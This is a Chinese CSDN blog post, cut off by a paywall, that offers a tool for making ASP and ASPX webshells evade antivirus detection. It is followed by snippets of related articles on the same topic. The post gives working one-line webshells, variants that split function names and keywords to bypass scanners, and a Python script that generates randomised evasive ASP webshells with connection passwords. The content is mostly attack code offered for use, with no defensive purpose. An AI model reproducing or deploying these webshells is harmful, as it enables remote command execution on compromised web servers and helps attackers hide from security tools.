webshell免杀小工具

最新推荐文章于 2024-05-28 14:22:36 发布
最新推荐文章于 2024-05-28 14:22:36 发布
阅读量547 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wo41ge/article/details/111661475
版权

ASP绕过

相比于php ,asp就很不灵活了,许多编码函数不自带,注释无法隔断函数关键字与括号。

但是依然有不少方法可以绕过

首先asp的一句话木马如下:

<%execute(request("x"))%>

使用函数分割关键字

<%

Function b():
    b = request("x")
End Function

Function a():
    eXecUTe(b())
End Function

a()

%>

连接密码:x

批量脚本

import random

shell = '''<%
<!--
Function {0}():
    {0} = request("{1}")
End Function

Function {2}():
    execUte({0}())
End Function
{2}()
-->

%>'''


def random_name(len):
    str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return ''.join(random.sample(str, len))


def build_webshell():
    FunctionName = random_name(4)
    parameter = random_name(4)
    FunctionName1 = random_name(4)
    shellc = shell.format(FunctionName, parameter, FunctionName1)
    return shellc


if __name__ == '__main__':
    print(build_webshell())

在这里插入图片描述

连接密码:VXAE

ASPX

其实原理是一样的,同样使用函数分割关键字

Request.Form["pureqh"]unsafe分割为两份使用两个函数拼接

<%@ Page Language="Jscript" Debug=true%>
<%
var a=Request.Form["pureqh"];
var b="unsa",c="fe",d=b+c;
function fun()
{
   
return a;
}
function fun1()
{
   
    eval(fun(),d);
}
fun1()
%>

批量脚本:

import random
shell = '''<%@ Page Language="Jscript" Debug=true%>
<%
var
最低0.47元/天 解锁文章
每天都要努力哇
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shell 免杀aspx_对于asp免杀webshell的一些总结
weixin_31235909的博客
12-31 626
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
shell 免杀aspx_webshell免杀套路
weixin_28767943的博客
01-30 664
0x01 前言尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧0x02 目录关于eval 与 assert字符串变形定义函数绕过回调函数回调函数变形特殊字符干扰数组类编码绕过无字符特征马PHP7.1后webshell何去何从总结0x03 关于eval 于 assert关于eval函数在php给出的官方说明是eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用 可变函数:通...
shell 免杀aspx_避开eval关键字,打造免杀一句话木马
weixin_30304773的博客
01-16 1930
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?首先我想到的是将eval从字符串类型赋给一个变量。如:$func = 'phpinfo';$func();这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想...
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
Webshell免杀工具(附加:流量混淆)
最新发布
Fly_鹏程万里
05-28 454
XGNTAI用于实现Webshell木马免杀、流量加密传输,生成免杀冰蝎、哥斯拉等Webshell的PHP、JSP木马文件,生成冰蝎流量加密传输配置文件。
一次另类的mssql渗透之路
include_voidmain的博客
06-08 491
一次另类的mssql渗透之路
webshell:免杀webshell生成工具
04-13
免杀webshell生成工具 知识点:使用注释分隔eval函数内关键字,使用类和构造函数替代引用函数 blog: command:python php_webshell.py 知识点:使用分隔关键字等绕过 blog: 知识点:使用自定义加密绕过杀软拼接...
PHP webshell免杀技术实践与探索.pdf
01-05
Webshell 是攻击者可以获得的最有利的工具Web 安全和代码安全对 Webshell免杀技术具有至关重要的影响。 6. 杀毒和防火墙策略 传统的 Webshell 免杀技术主要基于字符特征、内容特征等来欺骗防火墙策略。但这种...
源码免杀webshell
05-04
【源码免杀Webshell】是一种特殊的Web应用程序代码,它被设计...总结来说,源码免杀Webshell是一种高度隐蔽的攻击工具,其设计目的是绕过现有的安全检测机制。理解其工作原理对于提高网络安全意识和防御能力至关重要。
甲壳虫免杀webshell
04-25
甲壳虫免杀Webshell的特点在于其设计巧妙,能够避免常见的安全扫描工具检测到,这使得它在非法活动中更加难以被发现和清除。 免杀技术的核心是通过对恶意代码进行混淆、加密、分块传输等方式,使其在行为特征、字符...
new.bypass_bypass_NEW_免杀_webshell_phpwebshell_
10-03
对于系统管理员来说,理解和识别这类免杀Webshell的特征至关重要,以便采取有效的预防和应对措施,如加强输入验证、更新安全补丁、使用行为分析的检测工具等,以保护服务器免受此类攻击。同时,对Webshell进行深入...
aspxwebshell免杀过杀软亲自制作
10-29
亲自制作绝对过任何杀软360,node32等aspxwebshell,已生成图片格式,你看到的是一个图片jpg文件,把后缀名改为aspx格式传上去的就是一个aspxwebshell,实现进程管理,数据库管理,文件管理,端口映射,命令行等功能,附源码生成命令copy f.jpg/b +x.aspx/a hez.jpg
华夏免杀webshell
08-13
webshell webshell webshell webshell
最新免杀webshell
07-21
webshell 过世界杀软。带防删功能。提权加强版。
免杀各种webshell大搜集
06-21
免杀各种webshell大搜集,很多欢迎下载 www.711seo.com
shell 免杀aspx_Webshell免杀
weixin_39656513的博客
12-31 600
一句话木马在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。最常见的php一句话木马这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。本着这个原则,尝试改写一句话木马绕过WAF。搜集了几个常用的php函数执行代码的eval、assert、preg_replace接收数据的$_POST、$_GET、$...
ASPX一句话***--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
weixin_34366546的博客
08-09 623
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])注意:本文章首发[url]http://blog.csdn.net/kj021320/archive/2007/08/04/1726442.aspx[/url],后由原创作者kj021320友情提交到邪恶八进制信息安全团队论坛。首先回顾一下以前ASP一句话的经典***吧! <...
史上最全一句话木马
hackzkaq的博客
06-29 7727
目录 PHP //可执行命令一句话 PHP系列 过狗一句话 几个变性的php–过防火墙 过狗效果都不错: 密码-7 ASP asp 一句话 ASP过安全狗一句话 ASPX系列 ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp aspx一句话 JSP 过护卫神的abc123456789原来代码是 把标签修改替换下来 为......
shell 免杀aspx_发个免杀修改的aspx提权马qingshell.aspx
weixin_35795675的博客
01-30 578
protected void Page_load(object sender,EventArgs e){string ok = Request.QueryString["sb"];string shell= Request.QueryString["shell"];//www.moonsec.com moonResponse.Write(shell + ok );Response.Write(""...
webshell免杀
03-16
WebShell 免杀指的是让 WebShell 在网站管理员或安全软件扫描时不被检测到或误判为恶意软件。这可以通过混淆、加密或隐藏 WebShell 的代码来实现。但是需要注意的是,这并不能保证 WebShell 不会被发现或清除,并且使用 WebShell 也是非法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值